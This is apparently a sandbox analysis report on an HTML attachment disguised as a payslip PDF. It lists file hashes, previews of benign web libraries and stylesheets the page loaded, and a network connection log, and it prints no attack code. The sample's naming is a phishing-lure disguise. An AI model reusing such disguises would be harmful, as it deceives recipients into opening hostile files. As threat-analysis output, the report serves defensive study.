                                                                                                                      SHA-512:702E98810EE56DA290BA262A9E8A21E4799568AD29586860ECE62187B2F5E488D0BEF0BE51DEABBE00FCB170DB32B52030D97512279F00920C15E3589EF9582F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-testimonial.css?ver=15.0.6
                                                                                                                      Preview:.col.testimonial_slider{float:none}.testimonial_slider{float:none;opacity:0;margin-bottom:21px}html:not(.js) .testimonial_slider{opacity:1;height:auto}.testimonial_slider:not([data-style*=multiple_visible]) blockquote{padding-left:0;text-align:center;color:inherit;background-image:none;font-size:22px;width:100%;margin:0 auto;opacity:0;position:absolute}.testimonial_slider blockquote p{padding-bottom:30px}.testimonial_slider .controls ul{margin:0;display:block;text-align:center;width:100%}.testimonial_slider .controls ul li{list-style:none;cursor:pointer;display:inline}.testimonial_slider .controls ul li .pagination-switch{background-color:rgba(0,0,0,0);border:1px solid #333;border-radius:10px 10px 10px 10px;cursor:pointer;display:inline-block;height:10px;margin:0 4px;transition:background-color .2s linear 0s,border-color .2s linear 0s;width:10px}.testimonial_slider .controls ul li .pagination-switch.active,.testimonial_slider .controls ul li .pagination-switch:hover{background-color:#3
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (7281)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7416
                                                                                                                      Entropy (8bit):5.331948687854139
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:PEcg7lrL7LMgkubetbEL/Q0O3fWt2GANOr+FDVq26A00NmSvzuzGyXPn1BBLt8:Pi7lrPVSbV5y+FUVb4
                                                                                                                      MD5:8E9392EC75B6EF18BA671A0A4432D1B1
                                                                                                                      SHA1:7E7A63444FB918382D51BD2F7BD3757C0434FF10
                                                                                                                      SHA-256:FDCB39EEC676F0D52A9647156D6E1C5E0668EBDBB1060CB8FF89D5B4AB4695E8
                                                                                                                      SHA-512:5E3B713B57787FF0093A86B7B91180C7EB878CD652080258FD094CE4F978881795126671EE9AB0BC782310D8AA2FF83AF6733CB0E4FA6A0A57FE611062275890
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!.* jQuery Transit - CSS3 transitions and transformations.* (c) 2011-2012 Rico Sta. Cruz <rico@ricostacruz.com>.* MIT Licensed..*/..(function(k){k.transit={version:"0.9.9",propertyMap:{marginLeft:"margin",marginRight:"margin",marginBottom:"margin",marginTop:"margin",paddingLeft:"padding",paddingRight:"padding",paddingBottom:"padding",paddingTop:"padding"},enabled:true,useTransitionEnd:false};var d=document.createElement("div");var q={};function b(v){if(v in d.style){return v}var u=["Moz","Webkit","O","ms"];var r=v.charAt(0).toUpperCase()+v.substr(1);if(v in d.style){return v}for(var t=0;t<u.length;++t){var s=u[t]+r;if(s in d.style){return s}}}function e(){d.style[q.transform]="";d.style[q.transform]="rotateY(90deg)";return d.style[q.transform]!==""}var a=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;q.transition=b("transition");q.transitionDelay=b("transitionDelay");q.transform=b("transform");q.transformOrigin=b("transformOrigin");q.transform3d=e();var i={transition:"transit
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65451)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):88145
                                                                                                                      Entropy (8bit):5.291106244832159
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPma:ygZm0H5HO5+gCKWZyPmHQ47GKe
                                                                                                                      MD5:220AFD743D9E9643852E31A135A9F3AE
                                                                                                                      SHA1:88523924351BAC0B5D560FE0C5781E2556E7693D
                                                                                                                      SHA-256:0925E8AD7BD971391A8B1E98BE8E87A6971919EB5B60C196485941C3C1DF089A
                                                                                                                      SHA-512:6E722FCE1E8553BE592B1A741972C7F5B7B0CDAFCE230E9D2D587D20283482881C96660682E4095A5F14DF45A96EC193A9B222030C53B1B7BBE8312B2EAE440D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js
                                                                                                                      Preview:/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 720 x 383, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13311
                                                                                                                      Entropy (8bit):7.866740219905606
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:yoyJGqimqOEBJUSnhw9VoBplxS80ribNFA5M5XI:yoyJGqix+zkB/xMihRXI
                                                                                                                      MD5:E03E1CC4930C62B5FBEB919F64441DC8
                                                                                                                      SHA1:E703B5D3B5A4B13C6BA37386F53797735CBC6B85
                                                                                                                      SHA-256:CBE25939E41DADE2672B09D25EBCD848F0A3A061D07CCAC9463AE2BE6FAEDD82
                                                                                                                      SHA-512:48B8F0D87286B09FF306E5800A3D2EAA76DFB52484B6DC9405CDA45B38229FC81C7247D5E02E3B448A5609DCDBE168ABFB8941D7C920487AD73F875BC631B60B
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR.............`..:....tEXtSoftware.Adobe ImageReadyq.e<..3.IDATx...Ol#iz..........X....=.F}...J...0F:..`(..8#.t..9.M.9..qn9E.C0G...K..5......1....^.z..wwR..(..".HV...y....)..UQ..../...................................>z..6.D{}.....e3........|..[...>:3..4....B.......h....!.....8.)!z.........)............L............v%D.....w..~!Dw.....@~.q..4..4...l.K!.Y^1.......s~K(......^.....(..h.....Ct.P....ms.......,.0..4.@.,S...8..h....!Z...@.F...X.P.n........9}.B.8.v.[.z.x.....w~.......1O........M...;Au.......`......`.O>x[.........QR....h....E........}......h.@..n.^.O~......_...B............!..Q)@...p...........*.j/..}#.@......(i...\.._......4...._.....9{.z.A........k.!DS.%...@.jz..m.3.....e....t.O....o...z.............ve4J.Q_|u.O{..{.5......T-D../..m`4.#.F..!z.0l.......T*D_....FC..Hx..........T5H...u.(._....Xx.....~(@..U..:t../....8Dwj4l..9....@.Ct?J..f.!:\XX.n+[.g..^n..Z.....h.:..Q..Z....,.t.N.so.v.h...!z.....?...HuC........Z.....h.:..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (11602)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11753
                                                                                                                      Entropy (8bit):5.2003114365902015
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:W2xabEmE7km1dEhMaGqyS8SNWiwZmDFoM7w:rx6EmeksrNqX8dtmFf7w
                                                                                                                      MD5:525DF8133DC03CE6B7FB7CD017FE0EE0
                                                                                                                      SHA1:BBC596B7E054B02DF1C52D67D903F5202D3B4146
                                                                                                                      SHA-256:18949282236C58479862223954873F216B247953AAA1FAFD5F270CDD304C05E4
                                                                                                                      SHA-512:29ABDF382F64ABB48225507141FF9F92A95EB2B67E59A7CDE234F6BC438DAAF6A98C9279F31A77E5D6A3EE3568B710AE1522182202079EDBB279403C27BA5FC8
                                                                                                                      Malicious:false
                                                                                                                      Preview:/**. * vivus - JavaScript library to make drawing animation on SVG. * @version v0.4.2. * @link https://github.com/maxwellito/vivus. * @license MIT. */."use strict";!function(){function t(t){if("undefined"==typeof t)throw new Error('Pathformer [constructor]: "element" parameter is required');if(t.constructor===String&&(t=document.getElementById(t),!t))throw new Error('Pathformer [constructor]: "element" parameter is not related to an existing ID');if(!(t instanceof window.SVGElement||t instanceof window.SVGGElement||/^svg$/i.test(t.nodeName)))throw new Error('Pathformer [constructor]: "element" parameter must be a string or a SVGelement');this.el=t,this.scan(t)}function e(t,e,n){r(),this.isReady=!1,this.setElement(t,e),this.setOptions(e),this.setCallback(n),this.isReady&&this.init()}t.prototype.TYPES=["line","ellipse","circle","polygon","polyline","rect"],t.prototype.ATTR_WATCH=["cx","cy","points","r","rx","ry","x","x1","x2","y","y1","y2"],t.prototype.scan=function(t){for(var e,r,n,i,a=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (6991)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):7204
                                                                                                                      Entropy (8bit):5.148893930855167
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:w1Nqg5hvdVEKI0UEmXXYytmh7f0GpJYhMpCUC6YM:wzxdO9nOdC4YM
                                                                                                                      MD5:E54552107EF011915A2A08059E545DF8
                                                                                                                      SHA1:895A82347B10AC399BD241EF7489AF9E2435729D
                                                                                                                      SHA-256:503C6E88383027044029995F4DCF604D0BA35B9EF9482D36FB3582CCA2CE0B8B
                                                                                                                      SHA-512:5EA359ABDC52046A0A3E75A376FA6A0DD19C08228667947C52BDA08D3A214EECCECCB25D227C29A16664F538401F14A7B28D168409526F22331427753DFBB187
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/intersection-observer.min.js?ver=2.6.2
                                                                                                                      Preview:/**. * Copyright 2016 Google Inc. All Rights Reserved.. *. * Licensed under the W3C SOFTWARE AND DOCUMENT NOTICE AND LICENSE.. *. * https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document. *. */.!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersecting"in window.IntersectionObserverEntry.prototype||Object.defineProperty(window.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}});else{var t=window.document,e=[];o.prototype.THROTTLE_TIMEOUT=100,o.prototype.POLL_INTERVAL=null,o.prototype.USE_MUTATION_OBSERVER=!0,o.prototype.observe=function(t){if(!this._observationTargets.some(function(e){return e.element==t})){if(!t||1!=t.nodeType)throw new Error("target must be an Element");this._registerInstance(),this._observationTargets.push({element:t,entry:null}),this._monitorIntersec
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):8925
                                                                                                                      Entropy (8bit):7.596661108432522
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:WNLFpIJV9RqckUH44HhoBZq+M2H8BNdLFF1cr5BvJOiN/42v:kjID9aUHtHWzH8BbL6r5dJ2G
                                                                                                                      MD5:ECBDDDE84F30DC9BA40E311D84C2BCA7
                                                                                                                      SHA1:5A7A93E99556DFBADA8C1545A5F857E0AE29EBA3
                                                                                                                      SHA-256:9017B397156155CB238721EEBF535A363C7A00D30EDB31C628BCA6F5778CD4D5
                                                                                                                      SHA-512:773CB7406D9C3FD33C55DCB40F19D6EE5197DAD80BFC9A884E24E3873848DB519A59E7EFD2B86B507BA8B9EA0FB9FBA57D68B8FC5636CFBA59553F48211ED26E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/trend.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................".............................................................................................................................................J.J.......................................................................................... P0@...5..!1234.6......................!1A...q"2.Qa......R#3 0.Bbr..sP...S.4.......................P..!1. .a0@.q"....................!1.AQaq P......0.@.................................................................................................................................................................................................................................................>..,...................!.:...,w......M..............+Z..-....Z.gOK:...$.(me...............z..|.S..H.8\w..Y.,.V..N......<...*.."..#.O.@..>...a......s......).....'.Ri..."..Q...A&.FC1..3.x,2.'DP.....^.j.>...Y...KOV3.....].{...}m.{.d.|.bodE..9.2-3..e..R.N#.m..,c.E.T....]......LL...QM._.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 533x227, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):22522
                                                                                                                      Entropy (8bit):7.974462327792532
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:jBmIrcMJbTXrOe9xnTv6yG2qEdOJgKN9rwyQ9JXo0sikXNrH:dPTNzrHnGyl6NFwy4Pz4H
                                                                                                                      MD5:00FE7051B26FE2E6E5884EFF6FC02C38
                                                                                                                      SHA1:6ADEA777FDCA62124F089880847D2402DCFDFA8C
                                                                                                                      SHA-256:DEE48CCD2310BF97D262FF0DAE812C7875CAADFCCDDA92EB85D840DDFDBAE835
                                                                                                                      SHA-512:015DBE5C9F52802B8A1CF816708AA1E99796CF71E21A5D32085B960E541C2EB488E93EB22CAAFA82BE50294DDBD835046E135F3210E6D86253BBD70B8972D000
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................t..##..8o..W....................................................................................................................................................................................................................................... ..!10P"2.@A3.B#.$4.5.....................!..1A. Qa20@q...."BR..P.C..br.3...#.S4........................!....................!1. AQaq.0...@....P....................6.....". ...!.4..$hp...Q......."....,...m.:..M..+.{(.^.2..u.^...../Ng..<..8.X..4..g...(..:.9R..H.....AD.!.<......]..sG.(.s^K..Sv..Rn..y....s./x..YU...o..!..D.]1W.l...=..|.D\d.K.b.+..........H...N.AD.!.<.....ju..3[.(......=..W..O..Y.....c.#x..H. cU\...}'.WNb......x...a.~].gE..".......b..X.W.p....... ...B. ..$.!L......i.2~.}...Q.s..]M.....C..#Y>.'x..t<;....eo.2.Y...^;.7.....KNvDh5....c.,A.....8@.(}U..A.8.R.A..........Y..l-..)..S..N........i....V...eo....e9v.....~mj...~P}^;..k.'..y=...-."..4
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (9248), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9248
                                                                                                                      Entropy (8bit):4.798970172697514
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:We44ar0pCB+y+p+FA+UgFM3rzuD89mAB0mA8mAB0ms0mgB6mcTQ0jpgIABWGwEaI:Mb38W6Jz+MhxFZvUGN
                                                                                                                      MD5:02FE564E86E98C3C83D7F50C7AF9F5BC
                                                                                                                      SHA1:6A21249DB3070B6C729D3BAD7F58813424DC4177
                                                                                                                      SHA-256:7E80CEF9F5F538E386757FD448C26A185C5596526D7630C1786B86334549BD5B
                                                                                                                      SHA-512:B199F6EDC487DA647193829B4601E15D52AC2FA291206794F7D0BE050E55D204F5AF2D4A11557558707A3DC22F23240CC6B4B421B685114DDC247F2AB6573DB2
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/fullscreen-legacy.css?ver=15.0.6
                                                                                                                      Preview:#slide-out-widget-area.fullscreen,#slide-out-widget-area.fullscreen-alt{position:fixed;width:100%;height:100%;right:auto;left:0;top:0;z-index:9997;background-color:transparent!important;text-align:center;display:none;overflow-y:scroll;overflow-x:hidden;padding-right:20px;box-sizing:content-box;-webkit-box-sizing:content-box;-moz-box-sizing:content-box}#slide-out-widget-area.fullscreen .inner,#slide-out-widget-area.fullscreen-alt .inner{width:100%;position:relative;top:0;left:0;height:auto;margin:auto;padding:30px 0}#slide-out-widget-area.fullscreen .inner-wrap,#slide-out-widget-area.fullscreen-alt .inner-wrap{height:100%;margin-right:-20px;display:flex;flex-direction:column}.using-mobile-browser #slide-out-widget-area.fullscreen .inner-wrap,.using-mobile-browser #slide-out-widget-area.fullscreen-alt .inner-wrap{margin-right:0}.using-mobile-browser #slide-out-widget-area.fullscreen-alt{overflow:auto;padding-top:0}.using-mobile-browser #slide-out-widget-area.fullscreen-alt .inner-wrap{ov
                                                                                                                      File type:HTML document, Unicode text, UTF-8 text, with very long lines (5243), with CRLF line terminators
                                                                                                                      Entropy (8bit):5.263969309875163
                                                                                                                      TrID:
                                                                                                                      • HyperText Markup Language (12001/1) 20.69%
                                                                                                                      • HyperText Markup Language (12001/1) 20.69%
                                                                                                                      • HyperText Markup Language (11501/1) 19.83%
                                                                                                                      • HyperText Markup Language (11501/1) 19.83%
                                                                                                                      • HyperText Markup Language (11001/1) 18.97%
                                                                                                                      File name:Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html
                                                                                                                      File size:94'702 bytes
                                                                                                                      MD5:90a463a44208b31e07db0e080d6012bc
                                                                                                                      SHA1:3d7a6601c88a6622757f68fd80b32bfbf8834460
                                                                                                                      SHA256:165fa0473c1ea38af7a2c40e467d8597ea684516e545930c5ff724df8f6e4f0e
                                                                                                                      SHA512:9920185a557c7d772f8e9be54b02f083219c3e5088b0c28de44dc1dbcfb9f01febaa6f18d3102c3f4cbf830a621b5ab777a1f6448324ecfc9e5d48f1c6f0ae9c
                                                                                                                      SSDEEP:1536:DGkjGKbgAb3NIo9faAOsRi37shMeB8txJmYeyfmuu72ZQJMYesfm9uC:rOmOtiZyfhZRZsfa
                                                                                                                      TLSH:ED93EA2166C01379473342B572786B9AFE11916BE7068980F8BE922F2FF2D61D9731CD
                                                                                                                      File Content Preview:<html lang="en">..<head>..<meta charset="UTF-8">..<meta http-equiv="X-UA-Compatible" content="IE=edge">..<meta name="viewport" content="width=device-width, initial-scale=1.0">..<title></title>..<style>.. .BikuMo{.. display: none;.. }..</style
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 3, 2024 08:53:51.776221037 CET49675443192.168.2.4173.222.162.32
                                                                                                                      Dec 3, 2024 08:54:00.947355986 CET49737445192.168.2.423.218.56.5
                                                                                                                      Dec 3, 2024 08:54:01.067310095 CET4454973723.218.56.5192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:01.067398071 CET49737445192.168.2.423.218.56.5
                                                                                                                      Dec 3, 2024 08:54:01.067451954 CET49737445192.168.2.423.218.56.5
                                                                                                                      Dec 3, 2024 08:54:01.187350035 CET4454973723.218.56.5192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:04.763533115 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:04.763578892 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:04.763770103 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:04.770497084 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:04.770510912 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:04.885577917 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:04.885596991 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:04.886116028 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:04.886116028 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:04.886146069 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:05.003982067 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:05.003998041 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:05.004183054 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:05.005577087 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:05.005589962 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.394695997 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.394771099 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.397726059 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.397737980 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.398112059 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.447843075 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.468223095 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.515340090 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.583033085 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.583389997 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:06.583415031 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.584522963 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.584590912 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:06.590106010 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:06.590218067 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.620950937 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.621032000 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:06.624505997 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:06.624516964 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.624764919 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.633030891 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:06.633040905 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.679079056 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:06.679083109 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:06.904144049 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.904218912 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.904299974 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.904416084 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.904428005 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.904443026 CET49741443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.904447079 CET4434974123.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.938076019 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.938092947 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:06.938158989 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.938519001 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:06.938533068 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.295114994 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:08.339333057 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.376507998 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.378061056 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:08.378061056 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:08.378087997 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.378333092 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.379611015 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:08.427330017 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.903136015 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.903215885 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.903275967 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:08.904181004 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:08.904201984 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.904213905 CET49743443192.168.2.423.218.208.109
                                                                                                                      Dec 3, 2024 08:54:08.904218912 CET4434974323.218.208.109192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909091949 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909117937 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909126043 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909149885 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909162045 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909171104 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909188032 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:08.909209013 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.909230947 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:08.909259081 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:08.927509069 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.927572012 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:08.927599907 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:08.927649975 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:10.434484959 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:10.434530020 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:10.434591055 CET49739443192.168.2.44.245.163.56
                                                                                                                      Dec 3, 2024 08:54:10.434598923 CET443497394.245.163.56192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:12.642144918 CET4972380192.168.2.4199.232.210.172
                                                                                                                      Dec 3, 2024 08:54:12.762717009 CET8049723199.232.210.172192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:12.762784004 CET4972380192.168.2.4199.232.210.172
                                                                                                                      Dec 3, 2024 08:54:16.301392078 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:16.301459074 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:16.301532030 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:16.592816114 CET49740443192.168.2.4142.250.181.100
                                                                                                                      Dec 3, 2024 08:54:16.592840910 CET44349740142.250.181.100192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:23.004755020 CET4454973723.218.56.5192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:23.004861116 CET49737445192.168.2.423.218.56.5
                                                                                                                      Dec 3, 2024 08:54:23.004903078 CET49737445192.168.2.423.218.56.5
                                                                                                                      Dec 3, 2024 08:54:23.239921093 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:23.239989042 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:23.240051985 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:23.240525961 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:23.240544081 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:25.078353882 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:25.078636885 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:25.078665972 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:25.079900026 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:25.079967976 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:25.081201077 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:25.081337929 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:25.081429958 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:25.081438065 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:25.135993004 CET49754443192.168.2.423.21.241.83
                                                                                                                      Dec 3, 2024 08:54:25.515611887 CET4434975423.21.241.83192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:25.515638113 CET4434975423.21.241.83192.168.2.4
